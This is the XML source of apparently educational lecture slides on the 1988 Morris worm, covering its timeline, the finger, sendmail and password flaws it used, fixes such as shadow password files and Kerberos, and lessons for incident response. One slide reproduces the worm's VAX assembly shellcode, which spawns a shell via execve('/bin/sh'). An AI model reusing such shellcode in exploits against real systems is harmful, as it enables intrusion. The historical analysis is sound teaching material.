          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pushl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> $68732f ‘/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>\0’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pushl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> $6e69622f ‘/bin’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>movl</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sp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, r10</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pushl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> $0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pushl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> $0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pushl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> r10</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pushl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> $3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>movl</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sp</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ap</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>chmk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> $3b</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Textfeld 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4211410" y="4389932"/>
            <a:ext cx="3701143" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="95000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="003366"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(“/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>”, 0, 0)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1506528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Appendix III – Fix the Flaws</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Inhaltsplatzhalter 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="269421" y="1193506"/>
            <a:ext cx="11585122" cy="4929502"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Finger</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Program audits by various individuals have revealed other potential problems, and many </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>patches</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> have been circulated since November to deal with these flaws</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Sendmail</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Other flaws have been found and reported now that attention has been focused on the program, but it is not known for sure if all the bugs have been discovered and all the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>patches</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> circulated </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>hadow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> file: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>encrypted passwords are saved in a file (shadow) that is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>readable only by the system administrators</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, and a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>privileged call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>performs password encryptions and comparisons with an appropriate timed delay (0.5 to 1 second, for instance)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Change the utility that sets user passwords: nontrivial passwords (restrictions)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Trusted Logins:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Current remote access mechanism </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>should be removed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>and possibly replaced with something else</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Keberos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> authentication servers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This scheme uses dynamic session keys that need to be updated periodically. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Foliennummernplatzhalter 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0D37D001-F938-4858-B8AD-AB5D5789354B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>33</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39536029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Appendix IIII – Conclusion (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Condt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Inhaltsplatzhalter 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="269421" y="1193506"/>
            <a:ext cx="11585122" cy="4929502"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Increasing the obstacles to open communication or decreasing the number of people with access to in depth information will not prevent a determined hacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It will only decrease the pool of expertise and resources available to fight such an attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Purely technological attempt at prevention will not address the full problem</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This attack should also point out that we need a better mechanism in place to coordinate information about security flaws and attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The formation of the CERT may be a step in the right direction, but a more general solution is still needed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The response to this incident was largely ad hoc, and resulted in both duplication of effort and a failure to disseminate valuable information to sites that needed it. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Many site administrators discovered the problem from reading newspapers or watching television</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The major sources of information for many of the sites affected seems to have been Usenet news groups and mailing lists</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Foliennummernplatzhalter 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0D37D001-F938-4858-B8AD-AB5D5789354B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>34</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3265818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gende: mit Linie mit Akzentuierungsbalken 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="972000" y="5370652"/>
            <a:ext cx="2711669" cy="578735"/>
          </a:xfrm>
          <a:prstGeom prst="accentCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 57214"/>
              <a:gd name="adj2" fmla="val -2674"/>
              <a:gd name="adj3" fmla="val -291479"/>
              <a:gd name="adj4" fmla="val -15139"/>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1200" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>5 p.m., Nov. 2, 1988</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A program was executed on one or more hosts connected to the internet</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" i="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Legende: mit Linie mit Akzentuierungsbalken 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1624370" y="1504859"/>
            <a:ext cx="2711669" cy="614972"/>
          </a:xfrm>
          <a:prstGeom prst="accentCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 57214"/>
              <a:gd name="adj2" fmla="val -2674"/>
              <a:gd name="adj3" fmla="val 355571"/>
              <a:gd name="adj4" fmla="val -31787"/>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1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Collected host, network and user information and used them to break into other machines</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400" i="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Legende: mit Linie mit Akzentuierungsbalken 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2096341" y="4130034"/>
            <a:ext cx="2711669" cy="831772"/>
          </a:xfrm>
          <a:prstGeom prst="accentCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 57214"/>
              <a:gd name="adj2" fmla="val -2674"/>
              <a:gd name="adj3" fmla="val -50013"/>
              <a:gd name="adj4" fmla="val -28230"/>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1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Only two types of machines: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sun Microsystems Sun 3 systems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>VAX computers </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>with versions of 4BSD UNIX</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400" i="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Legende: mit Linie mit Akzentuierungsbalken 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2422109" y="2805143"/>
            <a:ext cx="1767926" cy="576850"/>
          </a:xfrm>
          <a:prstGeom prst="accentCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 57214"/>
              <a:gd name="adj2" fmla="val -2674"/>
              <a:gd name="adj3" fmla="val 150139"/>
              <a:gd name="adj4" fmla="val -34293"/>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1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Machines became more and more loaded with repeated infection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" i="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Legende: mit Linie mit Akzentuierungsbalken 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4808010" y="2192031"/>
            <a:ext cx="1893732" cy="613111"/>
          </a:xfrm>
          <a:prstGeom prst="accentCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 57214"/>
              <a:gd name="adj2" fmla="val -2674"/>
              <a:gd name="adj3" fmla="val 246161"/>
              <a:gd name="adj4" fmla="val -45348"/>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1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Some of the machines were unable to continue any processing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" i="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Legende: mit Linie mit Akzentuierungsbalken 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5258155" y="5246798"/>
            <a:ext cx="2508458" cy="818336"/>
          </a:xfrm>
          <a:prstGeom prst="accentCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 57214"/>
              <a:gd name="adj2" fmla="val -2674"/>
              <a:gd name="adj3" fmla="val -184822"/>
              <a:gd name="adj4" fmla="val -31268"/>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1200" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Early morning, Nov. 3., 1988</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>First “captures” of the program and analyzation by the University of California at Berkeley and MIT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Legende: mit Linie mit Akzentuierungsbalken 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6211653" y="4000336"/>
            <a:ext cx="2508458" cy="838607"/>
          </a:xfrm>
          <a:prstGeom prst="accentCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 57214"/>
              <a:gd name="adj2" fmla="val -2674"/>
              <a:gd name="adj3" fmla="val -32037"/>
              <a:gd name="adj4" fmla="val -42803"/>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1200" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>5 a.m., Nov. 3., 1988</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Computer Systems Research Group at Berkeley had developed a set of steps to halt its spread</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Legende: mit Linie mit Akzentuierungsbalken 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7766613" y="1357510"/>
            <a:ext cx="3217762" cy="1038527"/>
          </a:xfrm>
          <a:prstGeom prst="accentCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 57214"/>
              <a:gd name="adj2" fmla="val -2674"/>
              <a:gd name="adj3" fmla="val 226613"/>
              <a:gd name="adj4" fmla="val -13664"/>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1200" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>9 p.m., Nov. 3., 1988</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Another simple, effective method of stopping the invading program </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Berkley group provided patches to mend all the flaws</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Legende: mit Linie mit Akzentuierungsbalken 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9055261" y="2850820"/>
            <a:ext cx="1929114" cy="464493"/>
          </a:xfrm>
          <a:prstGeom prst="accentCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 57214"/>
              <a:gd name="adj2" fmla="val -2674"/>
              <a:gd name="adj3" fmla="val 183859"/>
              <a:gd name="adj4" fmla="val -63035"/>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1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Analyze the code and discover who unleashed it</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Titel 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>History</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Foliennummernplatzhalter 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
